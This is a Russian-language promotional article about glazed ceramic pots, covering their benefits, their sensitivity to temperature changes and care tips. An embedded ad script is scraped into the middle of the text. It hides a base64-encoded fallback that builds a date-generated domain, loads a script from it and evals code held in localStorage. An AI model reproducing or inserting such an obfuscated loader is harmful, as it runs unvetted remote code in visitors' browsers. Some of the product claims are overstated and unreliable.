Основная задача хозяйки — приготовить вкусную и полезную еду за короткий период времени. Для этих целей используют стандартные металлические кастрюли, изготовленные из нержавеющей стали, алюминия, или эмалированных сплавов. Можно кастрюли купить Киев глазированные, которые отличаются красивым внешним видом и глянцевым блеском. Такая посуда — обычные глиняные изделия, покрытые слоем легкоплавкого стекла, которое проникает в поры, трещины, углубления, обеспечивая гладкую глянцевую поверхность. Это улучшает антипригарные свойства посуды, что позволяет жарить в ней продукты с использованием масла.
Преимущества и недостатки керамических кастрюль
Основное преимущество — красивый внешний вид, абсолютная безопасность для здоровья человека.
Преимущества кастрюль из керамики:
Такие кастрюли не выделяют вредных веществ, не содержат в себе частичек тяжёлых металлов, которые могут проникать в еду в процессе приготовления. В отличие от тефлоновых поверхностей, которые со временем разрушаются и могут причинить вред организму человека, керамическая посуда абсолютно безопасная. Они подходят для жарки и тушения продуктов, устойчивы к появлению царапин, поэтому при приготовлении можно смело использовать металлическую кухонную утварь, не боясь поцарапать поверхность.
Основной недостаток керамической посуды — её чувствительность к перепадам температур. Именно поэтому не стоит резко охлаждать или нагревать посудину. Во время приготовления рекомендовано использовать рассеиватель, который распределяет пламя равномерно, не позволяет перегреваться отдельным участком посудины. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Как продлить срок службы керамических кастрюль?
Чтобы такая посуда служила долго, необходимо придерживаться ряда правил. Перед самым первым использованием рекомендовано вымыть посуду с использованием пищевой соды, вытереть насухо и смазать тонким слоем растительного масла. После этого осуществляется нагревание поверхности кастрюли. Это улучшит гладкость поверхности и не позволит прилипать продуктам во время приготовления.
Лучше всего не закрывать такую посуду, а хранить продукты в ней в открытом виде. Это связано с тем, что керамика может поглощать запахи. Если вы планируете в кастрюле готовить не только жаркое или тушёное мясо, но и десерты, рекомендуем тщательно вымывать посуду после приготовления пищи, и не хранить еду с закрытой крышкой. Такую посуду можно смело использовать для приготовления блюд в духовке. Необходимо ставить ёмкость в холодную печь. Далее осуществляется постепенное повышение температуры. Это гарантирует отсутствие перепадов температур, что обеспечивается сохранность и целостность посуды. (adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/preimushhestva-i-sposoby-ispolzovaniya-keramicheskih-kastryul/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook